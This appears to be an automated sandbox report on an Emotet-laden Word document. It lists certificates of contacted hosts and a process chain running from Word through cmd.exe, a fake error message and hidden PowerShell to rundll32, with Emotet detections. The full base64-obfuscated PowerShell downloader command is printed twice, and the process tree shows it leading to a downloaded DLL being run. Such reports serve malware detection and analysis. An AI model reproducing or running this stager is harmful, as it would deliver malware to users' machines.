Feb 11, 2021 10:32:42.499974966 CET	177.12.170.95	443	192.168.2.22	49167	CN=mrveggy.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Mon Jan 11 02:13:40 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Sun Apr 11 03:13:40 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Feb 11, 2021 10:32:42.499974966 CET	177.12.170.95	443	192.168.2.22	49167	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		05af1f5ca1b87cc9cc9b25185115607d
Feb 11, 2021 10:32:48.782140970 CET	35.163.191.195	443	192.168.2.22	49174	CN=www.ummahstars.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Fri Mar 20 12:52:22 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Thu May 19 22:40:05 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1664 Parent PID: 584

General

Start time:	10:31:36
Start date:	11/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fac0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2424 Parent PID: 1220

General

Start time:	10:31:38
Start date:	11/02/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgByAGYAZwAwACkAOwAkAFYAMwAyAEUAPQAoACgAJwBYACcAKwAnADcAMQAnACkAKwAnAEcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAcQA2AHIAZgBnADAAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADQAMgA1ADgAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQASQBxADYAcgBmAGcAMAAsACgAJwBTAGgAJwArACgAJwBvAHcARAAnACsAJwBpACcAKQArACcAYQAnACsAKAAnAGwAbwBnACcAKwAnAEEAJwApACkALgAiAHQAYABPAFMAVABgAFIAaQBOAEcAIgAoACkAOwAkAFAAOAA5AEcAPQAoACcAUwA4ACcAKwAnADEAVAAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMgAwAEcAPQAoACcAQgAnACsAKAAnADEAJwArACcAMgBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBaAD0AKAAnAFEAJwArACgAJwBfADUAJwArACcAQQAnACkAKQA=
Imagebase:	0x4a130000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msg.exe PID: 1320 Parent PID: 2424

General

Start time:	10:31:39
Start date:	11/02/2021
Path:	C:\Windows\System32\msg.exe
Wow64 process (32bit):	false
Commandline:	msg user /v Word experienced an error trying to open the file.
Imagebase:	0xff800000
File size:	26112 bytes
MD5 hash:	2214979661E779C3E3C33D4F14E6F3AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 1100 Parent PID: 2424

General

Start time:	10:31:39
Start date:	11/02/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgByAGYAZwAwACkAOwAkAFYAMwAyAEUAPQAoACgAJwBYACcAKwAnADcAMQAnACkAKwAnAEcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAcQA2AHIAZgBnADAAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADQAMgA1ADgAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQASQBxADYAcgBmAGcAMAAsACgAJwBTAGgAJwArACgAJwBvAHcARAAnACsAJwBpACcAKQArACcAYQAnACsAKAAnAGwAbwBnACcAKwAnAEEAJwApACkALgAiAHQAYABPAFMAVABgAFIAaQBOAEcAIgAoACkAOwAkAFAAOAA5AEcAPQAoACcAUwA4ACcAKwAnADEAVAAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMgAwAEcAPQAoACcAQgAnACsAKAAnADEAJwArACcAMgBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBaAD0AKAAnAFEAJwArACgAJwBfADUAJwArACcAQQAnACkAKQA=
Imagebase:	0x13ff80000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2696 Parent PID: 1100

General

Start time:	10:32:14
Start date:	11/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
Imagebase:	0xff940000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2724 Parent PID: 2696

General

Start time:	10:32:14
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.2170071042.0000000000200000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.2169962101.0000000000130000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 1980 Parent PID: 2724

General

Start time:	10:32:19
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2180978806.0000000000390000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2180920287.0000000000370000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2190752783.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2452 Parent PID: 1980

General

Start time:	10:32:24
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gyuopigcwtoen\gfvxluzjzkjy.upj',FOsZnZScT
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2196520380.0000000010000000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2193792895.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2193729394.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2964 Parent PID: 2452

General

Start time:	10:32:30
Start date:	11/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gyuopigcwtoen\gfvxluzjzkjy.upj',#1
Imagebase:	0x530000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
